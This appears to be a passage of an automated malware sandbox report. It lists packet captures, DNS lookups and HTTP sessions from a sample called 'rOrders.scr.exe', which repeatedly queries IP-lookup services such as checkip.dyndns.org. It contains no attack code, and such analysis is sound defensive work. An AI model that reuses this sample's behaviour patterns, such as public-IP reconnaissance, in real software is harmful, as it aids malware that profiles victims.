Jan 13, 2025 13:31:22.498954058 CET	80	49720	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:23.166779995 CET	80	49720	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:23.168217897 CET	49721	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:23.168262959 CET	443	49721	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:23.168339014 CET	49721	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:23.168745041 CET	49721	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:23.168759108 CET	443	49721	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:23.220721960 CET	49720	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:23.625741005 CET	443	49721	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:23.627405882 CET	49721	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:23.627439976 CET	443	49721	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:23.771254063 CET	443	49721	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:23.771445036 CET	443	49721	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:23.771502972 CET	49721	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:23.772247076 CET	49721	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:23.780345917 CET	49720	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:23.781667948 CET	49722	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:23.785392046 CET	80	49720	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:23.785444975 CET	49720	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:23.786479950 CET	80	49722	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:23.786540031 CET	49722	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:23.786642075 CET	49722	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:23.791385889 CET	80	49722	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:24.458194971 CET	80	49722	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:24.459404945 CET	49723	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:24.459453106 CET	443	49723	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:24.459508896 CET	49723	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:24.459755898 CET	49723	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:24.459764957 CET	443	49723	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:24.501988888 CET	49722	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:24.916613102 CET	443	49723	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:24.918276072 CET	49723	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:24.918306112 CET	443	49723	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:25.043565989 CET	443	49723	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:25.043716908 CET	443	49723	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:25.043978930 CET	49723	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:25.044233084 CET	49723	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:26.144531012 CET	49724	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:26.153423071 CET	80	49724	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:26.153523922 CET	49724	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:26.153995991 CET	49724	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:26.158720016 CET	80	49724	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:27.853256941 CET	80	49724	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:27.853964090 CET	80	49724	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:27.854213953 CET	80	49724	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:27.854268074 CET	49724	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:27.854845047 CET	80	49724	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:27.854873896 CET	49724	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:27.854899883 CET	49724	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:27.856682062 CET	49724	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:27.864274025 CET	80	49724	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:28.070064068 CET	80	49724	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:28.111407042 CET	49724	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:28.568631887 CET	49727	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:28.568680048 CET	443	49727	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:28.568789959 CET	49727	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:28.573129892 CET	49727	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:28.573143005 CET	443	49727	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:29.026546955 CET	443	49727	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:29.027574062 CET	49727	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:29.029593945 CET	49727	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:29.029609919 CET	443	49727	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:29.029922009 CET	443	49727	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:29.080271006 CET	49727	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:29.083967924 CET	49727	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:29.131328106 CET	443	49727	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:29.186948061 CET	443	49727	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:29.187118053 CET	443	49727	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:29.187246084 CET	49727	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:29.190330982 CET	49727	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:29.194169998 CET	49724	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:29.199042082 CET	80	49724	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:29.404639959 CET	80	49724	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:29.407011986 CET	49740	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:29.407032967 CET	443	49740	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:29.407095909 CET	49740	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:29.407377005 CET	49740	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:29.407385111 CET	443	49740	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:29.455147982 CET	49724	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:29.876873970 CET	443	49740	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:29.884799957 CET	49740	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:29.884830952 CET	443	49740	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:29.997855902 CET	443	49740	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:29.997941017 CET	443	49740	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:29.998188019 CET	49740	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:29.998452902 CET	49740	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:30.001741886 CET	49724	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:30.003144026 CET	49741	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:30.006719112 CET	80	49724	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:30.006778955 CET	49724	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:30.007961035 CET	80	49741	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:30.008045912 CET	49741	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:30.008130074 CET	49741	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:30.012881041 CET	80	49741	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:30.710335016 CET	80	49741	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:30.711622000 CET	49748	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:30.711663961 CET	443	49748	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:30.711734056 CET	49748	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:30.711997032 CET	49748	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:30.712012053 CET	443	49748	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:30.752068996 CET	49741	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:31.186744928 CET	443	49748	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:31.204758883 CET	49748	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:31.204792023 CET	443	49748	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:31.313977003 CET	443	49748	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:31.314141035 CET	443	49748	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:31.314203978 CET	49748	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:31.314662933 CET	49748	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:31.319576979 CET	49754	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:31.324393034 CET	80	49754	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:31.324466944 CET	49754	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:31.324553013 CET	49754	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:31.329319954 CET	80	49754	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:32.000776052 CET	80	49754	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:32.002650023 CET	49759	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:32.002686024 CET	443	49759	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:32.002932072 CET	49759	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:32.003182888 CET	49759	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:32.003197908 CET	443	49759	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:32.046003103 CET	49754	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:32.485093117 CET	443	49759	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:32.487445116 CET	49759	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:32.487466097 CET	443	49759	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:32.611809015 CET	443	49759	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:32.611975908 CET	443	49759	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:32.612077951 CET	49759	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:32.612509012 CET	49759	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:32.616211891 CET	49754	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:32.617348909 CET	49763	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:32.621205091 CET	80	49754	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:32.621316910 CET	49754	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:32.622154951 CET	80	49763	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:32.622268915 CET	49763	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:32.622405052 CET	49763	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:32.627254963 CET	80	49763	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:33.313203096 CET	80	49763	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:33.314923048 CET	49764	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:33.314943075 CET	443	49764	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:33.314997911 CET	49764	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:33.315243006 CET	49764	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:33.315253019 CET	443	49764	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:33.361399889 CET	49763	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:33.802104950 CET	443	49764	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:33.803855896 CET	49764	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:33.803884029 CET	443	49764	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:33.947652102 CET	443	49764	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:33.947715044 CET	443	49764	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:33.947772980 CET	49764	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:33.948685884 CET	49764	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:33.952455997 CET	49763	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:33.953213930 CET	49769	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:33.957603931 CET	80	49763	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:33.957890034 CET	49763	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:33.958208084 CET	80	49769	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:33.958364010 CET	49769	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:33.959043980 CET	49769	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:33.963826895 CET	80	49769	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:34.656569958 CET	80	49769	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:34.657908916 CET	49774	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:34.657984972 CET	443	49774	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:34.658065081 CET	49774	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:34.658554077 CET	49774	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:34.658585072 CET	443	49774	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:34.705169916 CET	49769	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:35.148627996 CET	443	49774	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:35.150748968 CET	49774	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:35.150769949 CET	443	49774	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:35.282466888 CET	443	49774	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:35.282644987 CET	443	49774	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:35.282759905 CET	49774	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:35.283108950 CET	49774	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:35.287451029 CET	49769	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:35.288536072 CET	49779	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:35.292433023 CET	80	49769	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:35.292498112 CET	49769	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:35.293421030 CET	80	49779	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:35.293493986 CET	49779	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:35.293595076 CET	49779	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:35.298379898 CET	80	49779	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:35.990299940 CET	80	49779	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:35.993334055 CET	49784	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:35.993390083 CET	443	49784	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:35.996118069 CET	49784	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:35.996354103 CET	49784	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:35.996367931 CET	443	49784	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:36.033304930 CET	49779	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:36.476922035 CET	443	49784	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:36.478667021 CET	49784	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:36.478684902 CET	443	49784	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:36.625968933 CET	443	49784	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:36.626050949 CET	443	49784	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:36.626456022 CET	49784	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:36.626733065 CET	49784	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:36.630140066 CET	49779	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:36.631325960 CET	49790	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:36.635106087 CET	80	49779	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:36.635175943 CET	49779	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:36.636094093 CET	80	49790	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:36.636163950 CET	49790	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:36.636236906 CET	49790	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:36.640959978 CET	80	49790	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:37.364162922 CET	80	49790	132.226.247.73	192.168.2.5
Jan 13, 2025 13:31:37.365567923 CET	49794	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:37.365623951 CET	443	49794	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:37.365689039 CET	49794	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:37.365932941 CET	49794	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:37.365951061 CET	443	49794	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:37.408339977 CET	49790	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:31:37.854207993 CET	443	49794	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:37.855984926 CET	49794	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:37.856023073 CET	443	49794	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:37.974445105 CET	443	49794	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:37.974524975 CET	443	49794	104.21.32.1	192.168.2.5
Jan 13, 2025 13:31:37.974651098 CET	49794	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:31:37.975182056 CET	49794	443	192.168.2.5	104.21.32.1
Jan 13, 2025 13:32:21.717418909 CET	80	49710	132.226.247.73	192.168.2.5
Jan 13, 2025 13:32:21.717545986 CET	49710	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:32:29.458390951 CET	80	49722	132.226.247.73	192.168.2.5
Jan 13, 2025 13:32:29.458714008 CET	49722	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:32:36.553368092 CET	80	49741	132.226.247.73	192.168.2.5
Jan 13, 2025 13:32:36.553486109 CET	49741	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:32:36.553556919 CET	80	49741	132.226.247.73	192.168.2.5
Jan 13, 2025 13:32:36.553601980 CET	49741	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:32:36.553791046 CET	80	49741	132.226.247.73	192.168.2.5
Jan 13, 2025 13:32:36.553828001 CET	49741	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:32:42.325822115 CET	80	49790	132.226.247.73	192.168.2.5
Jan 13, 2025 13:32:42.326025009 CET	49790	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:33:04.471945047 CET	49722	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:33:04.476834059 CET	80	49722	132.226.247.73	192.168.2.5
Jan 13, 2025 13:33:17.377758026 CET	49790	80	192.168.2.5	132.226.247.73
Jan 13, 2025 13:33:17.382770061 CET	80	49790	132.226.247.73	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:31:13.253032923 CET	64175	53	192.168.2.5	1.1.1.1
Jan 13, 2025 13:31:13.259849072 CET	53	64175	1.1.1.1	192.168.2.5
Jan 13, 2025 13:31:14.234524012 CET	57335	53	192.168.2.5	1.1.1.1
Jan 13, 2025 13:31:14.241564035 CET	53	57335	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 13:31:13.253032923 CET	192.168.2.5	1.1.1.1	0x1742	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:31:14.234524012 CET	192.168.2.5	1.1.1.1	0xf3d5	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 13:31:13.259849072 CET	1.1.1.1	192.168.2.5	0x1742	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 13:31:13.259849072 CET	1.1.1.1	192.168.2.5	0x1742	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:31:13.259849072 CET	1.1.1.1	192.168.2.5	0x1742	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:31:13.259849072 CET	1.1.1.1	192.168.2.5	0x1742	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:31:13.259849072 CET	1.1.1.1	192.168.2.5	0x1742	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:31:13.259849072 CET	1.1.1.1	192.168.2.5	0x1742	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:31:14.241564035 CET	1.1.1.1	192.168.2.5	0xf3d5	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:31:14.241564035 CET	1.1.1.1	192.168.2.5	0xf3d5	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:31:14.241564035 CET	1.1.1.1	192.168.2.5	0xf3d5	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:31:14.241564035 CET	1.1.1.1	192.168.2.5	0xf3d5	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:31:14.241564035 CET	1.1.1.1	192.168.2.5	0xf3d5	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:31:14.241564035 CET	1.1.1.1	192.168.2.5	0xf3d5	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 13:31:14.241564035 CET	1.1.1.1	192.168.2.5	0xf3d5	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	132.226.247.73	80	4760	C:\Users\user\Desktop\rOrders.scr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:31:13.289658070 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 13:31:13.977036953 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 13:31:13.982013941 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 13:31:14.193799019 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 13:31:15.199537039 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 13:31:15.412225962 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49710	132.226.247.73	80	4760	C:\Users\user\Desktop\rOrders.scr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:31:16.046391964 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 13:31:16.719012976 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49712	132.226.247.73	80	4760	C:\Users\user\Desktop\rOrders.scr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:31:17.344068050 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 13:31:19.045001984 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	132.226.247.73	80	4760	C:\Users\user\Desktop\rOrders.scr.exe

Timestamp	Bytes transferred	Direction	Data
